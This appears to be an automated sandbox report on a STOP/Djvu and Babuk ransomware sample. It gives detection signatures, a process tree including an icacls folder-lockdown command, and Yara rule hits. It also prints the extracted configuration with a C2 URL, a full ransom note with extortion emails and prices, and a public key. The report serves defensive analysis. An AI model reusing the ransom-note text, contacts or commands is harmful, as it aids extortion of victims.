Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1490493
MD5:	d7528cd33b73718b5949277420681f90
SHA1:	61d97f8da20ff2995890ce5f2c8a2c9e6e51c078
SHA256:	3b8d07693e296aee36e7607c71503d981396a21b367e169146afdd052cdcf4d1
Tags:	exe
Infos:

Detection

Babuk, Djvu

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Found ransom note / readme

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected Babuk Ransomware

Yara detected Djvu Ransomware

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies existing user documents (likely ransomware behavior)

Writes a notice file (html or txt) to demand a ransom

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to dynamically determine API calls

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to query network adapater information

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after checking a module file name)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Sigma detected: CurrentVersion Autorun Keys Modification

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses cacls to modify the permissions of files

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 6708 cmdline: "C:\Users\user\Desktop\file.exe" MD5: D7528CD33B73718B5949277420681F90)

file.exe (PID: 6956 cmdline: "C:\Users\user\Desktop\file.exe" MD5: D7528CD33B73718B5949277420681F90)

icacls.exe (PID: 7132 cmdline: icacls "C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c" /deny *S-1-1-0:(OI)(CI)(DE,DC) MD5: 2E49585E4E08565F52090B144062F97E)

file.exe (PID: 7164 cmdline: "C:\Users\user\Desktop\file.exe" --Admin IsNotAutoStart IsNotTask MD5: D7528CD33B73718B5949277420681F90)

file.exe (PID: 5644 cmdline: "C:\Users\user\Desktop\file.exe" --Admin IsNotAutoStart IsNotTask MD5: D7528CD33B73718B5949277420681F90)

file.exe (PID: 5576 cmdline: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe --Task MD5: D7528CD33B73718B5949277420681F90)

file.exe (PID: 4904 cmdline: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe --Task MD5: D7528CD33B73718B5949277420681F90)

file.exe (PID: 7060 cmdline: "C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe" --AutoStart MD5: D7528CD33B73718B5949277420681F90)

file.exe (PID: 3512 cmdline: "C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe" --AutoStart MD5: D7528CD33B73718B5949277420681F90)

file.exe (PID: 600 cmdline: "C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe" --AutoStart MD5: D7528CD33B73718B5949277420681F90)

file.exe (PID: 5944 cmdline: "C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe" --AutoStart MD5: D7528CD33B73718B5949277420681F90)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Babuk	Babuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time. as well It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.	No Attribution	http://chuongdong.com/reverse%20engineering/2021/01/03/BabukRansomware/ https://blog.cyble.com/2022/05/06/rebranded-babuk-ransomware-in-action-darkangels-ransomware-performs-targeted-attack/ https://blog.morphisec.com/babuk-ransomware-variant-major-attack https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html https://chuongdong.com/reverse%20engineering/2021/01/16/BabukRansomware-v3/	https://malpedia.caad.fkie.fraunhofer.de/details/win.babuk

Name	Description	Attribution	Blogpost URLs	Link
STOP, Djvu	STOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.	No Attribution	https://angle.ankura.com/post/102het9/the-stop-ransomware-variant https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://cybergeeks.tech/a-detailed-analysis-of-the-stop-djvu-ransomware/ https://cybleinc.com/2021/06/21/djvu-malware-of-stop-ransomware-family-back-with-new-variant/	https://malpedia.caad.fkie.fraunhofer.de/details/win.stop

Malware Configuration

Threatname: Djvu

{"Download URLs": [""], "C2 url": "http://cajgtus.com/test1/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool:\r\nhttps://wetransfer.com/downloads/abe121434ad837dd5bdd03878a14485820240531135509/34284d\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0874PsawqS", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsZOJbLC8rdQ3RNFdWJ9l\\\\nsRHwDxjXZCN4K9IEo3ccj2X7KVzvLXJ\\/I+jMWoFDgbTA5TMMDPMhlSykGYr1rbX9\\\\ntDxs5EL7FC3R6jbLzQ+QVdvG2Slvd1aEiSAhkrB6Z97DC28ixTGkA4aCQKKFT5ge\\\\nSXPpDStS2N3zeiWPCMkOs9RErtxVW9sXoWRAFtBg2kSHTyKEWcRqnxplrJGdVQKU\\\\n0DxDnHDefnxaf\\/3VSRczBwGZlq\\/Mr2bfHM2Mf8JWmYztlmGbjGb\\/\\/oixuuRePxzt\\\\n6xgozgVrC64HnagNFyODdlk2w\\/BpJWXIbgivZ0kR40Ll3NEAl3Z26cIkIc6pAJ3s\\\\nfwIDAQAB\\\\n-----END PUBLIC KEY-----"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.1978609190.00000000020F6000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000003.00000002.1882592220.0000000002177000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000A.00000002.2056830480.00000000020FE000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000C.00000002.2066559473.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000000C.00000002.2066559473.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0000000C.00000002.2066559473.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000004.00000002.2105224464.0000000002148000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.1752226229.00000000021A0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000000.00000002.1752226229.00000000021A0000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0000000D.00000002.2936387316.0000000000868000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000000B.00000002.1992636135.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000000B.00000002.1992636135.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0000000B.00000002.1992636135.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000000.00000002.1752159390.000000000210D000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000A.00000002.2056958884.00000000022C0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000000A.00000002.2056958884.00000000022C0000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000006.00000002.1978697322.0000000002230000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000006.00000002.1978697322.0000000002230000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000004.00000002.2105284111.00000000021E0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000004.00000002.2105284111.00000000021E0000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000003.00000002.1883209457.00000000022F0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000003.00000002.1883209457.00000000022F0000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000007.00000002.1892636740.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000007.00000002.1892636740.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000007.00000002.1892636740.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
0000000D.00000002.2936140866.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000000D.00000002.2936140866.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0000000D.00000002.2936140866.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
Process Memory Space: file.exe PID: 6708	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: file.exe PID: 6708	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x31e9f:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: file.exe PID: 6956	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: file.exe PID: 6956	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x53f05:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: file.exe PID: 7164	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: file.exe PID: 7164	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x3a159:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: file.exe PID: 5576	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: file.exe PID: 5576	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x3761a:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: file.exe PID: 7060	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: file.exe PID: 7060	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x35710:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: file.exe PID: 5644	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: file.exe PID: 5644	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x3949e:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: file.exe PID: 600	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: file.exe PID: 600	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x3703f:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: file.exe PID: 3512	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: file.exe PID: 3512	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x3eec7:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: file.exe PID: 5944	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: file.exe PID: 5944	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x3ecee:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: file.exe PID: 4904	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: file.exe PID: 4904	JoeSecurity_babuk	Yara detected Babuk Ransomware	Joe Security
Process Memory Space: file.exe PID: 4904	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x52e83:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Click to see the 47 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.file.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
1.2.file.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
1.2.file.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
6.2.file.exe.22315a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
6.2.file.exe.22315a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
6.2.file.exe.22315a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
3.2.file.exe.22f15a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
3.2.file.exe.22f15a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
3.2.file.exe.22f15a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
10.2.file.exe.22c15a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
10.2.file.exe.22c15a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
